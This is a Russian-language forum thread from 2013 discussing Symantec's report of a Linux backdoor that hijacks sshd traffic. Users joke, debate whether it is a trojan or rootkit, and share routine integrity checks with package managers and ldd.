Мне как-то эти циферки безразличны.
Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

99. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от linux must __RIP__ on 17-Ноя-13, 12:08 
> key=, dhost=, hbt=3600, sp=, sk=, dip=,... - это половые фантазии Симантека,
> эти токены, можно сказать стандарт для ботнетов. Кто-то давно написал, вот
> исходники и кочуют между хак-группами.
> А бинарники, в дистрибутивах, проверяют на контрольные суммы:
> # rpm -V  openssh
> openssh
> 5S.T.....  c /etc/ssh/sshd_config
> missing     /lib/systemd/system/sshd.service
> # debsums openssh
> ...

чукча не читатель.. Там же написано что бинарник они не модифицируют.. А вся хрень сидит в памяти..

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

111. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 17-Ноя-13, 23:31 
> чукча не читатель..

Чукча, это вы с таким дурацким ником сидите? :)

Ответить | Правка | ^ к родителю #99 | Наверх | Cообщить модератору

25. "Linux-бэкдор, организующий скрытый канал связи в..."  –1 +/
Сообщение от arisu (ok) on 16-Ноя-13, 03:38 
я не понял, где пакет-то установочный скачать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "Linux-бэкдор, организующий скрытый канал связи в..."  +2 +/
Сообщение от Andrey Mitrofanov on 16-Ноя-13, 11:07 
> я не понял, где пакет-то установочный скачать?

Анафема! Надо было GLPv3+ исходники требовать.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

72. "Linux-бэкдор, организующий скрытый канал связи в..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 18:14 
> я не понял, где пакет-то установочный скачать?

Само приползет.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

77. "Linux-бэкдор, организующий скрытый канал связи в..."  +/
Сообщение от arisu (ok) on 16-Ноя-13, 18:36 
>> я не понял, где пакет-то установочный скачать?
> Само приползет.

все авторы это обещают, а оно всё не ползёт и не ползёт. и куда багрепорты слать — а главное, какие — не ясно.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

27. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Аноним (??) on 16-Ноя-13, 04:52 
На системе с SELinux + pax +SSP и pie прокатит?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 05:44 
Это руткит, а не эксплоит.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

37. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от Аноним (??) on 16-Ноя-13, 08:37 
да.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

28. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –3 +/
Сообщение от Аноним (??) on 16-Ноя-13, 05:13 
не плохо, придумано
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

73. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +2 +/
Сообщение от Аноним (??) on 16-Ноя-13, 18:15 
> не плохо, придумано

Два Розенталя этому господину. Неплохо пишется слитно, запятая вообще не нужна. Всосал?

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

94. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Crazy Alex (ok) on 17-Ноя-13, 00:58 
Этому не поможет и три
Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

33. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от Омский линуксоид email(ok) on 16-Ноя-13, 07:26 
где взять PPA с таким "бекдором"? Нужно очень.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 08:55 
> Компания Symantec в результате разбора

Это не та компашка, которая пихает свои поделия на диски с вендовыми драйверами к материнским платам? Домашние типа админы это ставят (по привычке ставить все, за что уплочено), а потом мучительно выпиливают эмэсконфигом, регэдитом и сисиклинером?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Аноним (??) on 16-Ноя-13, 09:11 
Последняя строка из оригинала новости

Symantec protects customers by detecting this back door as Linux.Fokirtor.

ЧТД

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

90. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 21:07 
Symantec detects customers by protecting this backdoor.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

57. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Куяврик on 16-Ноя-13, 14:34 
>  сисиклинером?

какая завидная профессия.

ах, да: софт называется сиклинер.

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

40. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от Аноним (??) on 16-Ноя-13, 09:09 
Во всей этой истории есть непонятое место. А именно, что это. На одном отечественном уважаемом вирусоборческом ресурсе оно названо вирусом. думаю, это неверно. Ибо на некоторых не менее уважаемых зарубежных ресурсах оно названо трояном.

Не буду тут пояснять различия. Но главное - троян сам не попадает в систему. Его нужно установить. В случае с Linux - с правами суперпользователя. Неважно, установили вы ppa сами, скачали и прописали его в системе, или это сделал за Вас скрипт. Изначально нужно войти суперпользователем и целенаправленно запустить скрипт.

Так что много шума из ничего.

А выводы - не ставьте нестандартные ppa. Из последнего. В Ubuntu 12.04 GIMPа 2.8 не было в репах. Можно было мучительно собирать из исходников, либо искать вручную кучу модулей. А можно было поставить ppa некоего парнишки по имении ... внимание ... кисельгуляш ... А проблема решалась проще - обновить дистрибутив до 13.04.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –6 +/
Сообщение от Адекват (ok) on 16-Ноя-13, 11:18 
[quote]
Библиотека связывается с работающими на системе сетевыми процессами, такими как sshd, берёт на себя обработку указанных вызовов и получает контроль над трафиком поражённых серверных приложений.
[/quote]
Тааак...
для начала смотрим какие библиотеки использует sshd, для примера.
[quote]
[user0@homelinux ~]$ ldd `which sshd`
    linux-gate.so.1 (0xb77c1000)
    libpam.so.0 => /usr/lib/libpam.so.0 (0xb7775000)
    libcrypto.so.1.0.0 => /usr/lib/libcrypto.so.1.0.0 (0xb75ab000)
    libutil.so.1 => /usr/lib/libutil.so.1 (0xb75a7000)
    libz.so.1 => /usr/lib/libz.so.1 (0xb7590000)
    libcrypt.so.1 => /usr/lib/libcrypt.so.1 (0xb755f000)
    libgssapi_krb5.so.2 => /usr/lib/libgssapi_krb5.so.2 (0xb7516000)
    libkrb5.so.3 => /usr/lib/libkrb5.so.3 (0xb744c000)
    libc.so.6 => /usr/lib/libc.so.6 (0xb729c000)
    libdl.so.2 => /usr/lib/libdl.so.2 (0xb7297000)
    libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0xb7261000)
    libcom_err.so.2 => /usr/lib/libcom_err.so.2 (0xb725b000)
    libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0xb724e000)
    libkeyutils.so.1 => /usr/lib/libkeyutils.so.1 (0xb7249000)
    libresolv.so.2 => /usr/lib/libresolv.so.2 (0xb7231000)
    /lib/ld-linux.so.2 (0xb77c2000)
    libpthread.so.0 => /usr/lib/libpthread.so.0 (0xb7215000)
[user0@homelinux ~]$
[/quote]

потом смотрим каким пакетам принадлежат эти библиотеки:
[quote]
[user0@homelinux ~]$ pacman -Qo /usr/lib/libpthread.so.0
/usr/lib/libpthread.so.0 принадлежит glibc 2.18-9
[user0@homelinux ~]$
[/quote]
пакет glibc ставится из офф репа, и имеет цифровую подпись.
Я думаю это поможет выявить злодея.
На крайний случай, можно просто переустановить sshd, и все приложения, который предаставляют разделяемые библиотеки sshd'у, переустановить из офф репов.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

106. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +1 +/
Сообщение от cmp (ok) on 17-Ноя-13, 18:04 
Елки-палки, оно модифицирует запущенный процесс sshd, а бинарник системный ему не интересен. анализ дампа памяти процесса нужен для отслеживания этих изменений, а поймать модификацию бинарника можно штатными командами практически любого пакетного менеджера.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

49. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Аноним (??) on 16-Ноя-13, 11:48 
Причём здесь ядро Linux?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

50. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  +/
Сообщение от Andrey Mitrofanov on 16-Ноя-13, 11:52 
> Причём здесь ядро Linux?

Деситтна, GNU/Linux же!

...""a dynamic linker model where a portion of the executable includes a very simple linker stub which causes the operating system to load an external library into memory. [...] The source code for the GNU/Linux linker is part of the glibc [...] code is available under the GNU LGPL.

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

66. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –2 +/
Сообщение от Аноним (??) on 16-Ноя-13, 17:07 
> is part of the glibc
> glibc

Причём здесь ведро Лёликс?

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

53. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –1 +/
Сообщение от Аноним (??) on 16-Ноя-13, 13:28 
> Причём здесь ядро Linux?

Потому что заказ на него.

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

100. "Linux-бэкдор, организующий скрытый канал связи в легитимном ..."  –3 +/
Сообщение от Аноним (??) on 17-Ноя-13, 14:21 
Надо просто издать закон, озвучить его на самом высоком уровне. Шалуны сами разбегутся ))
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру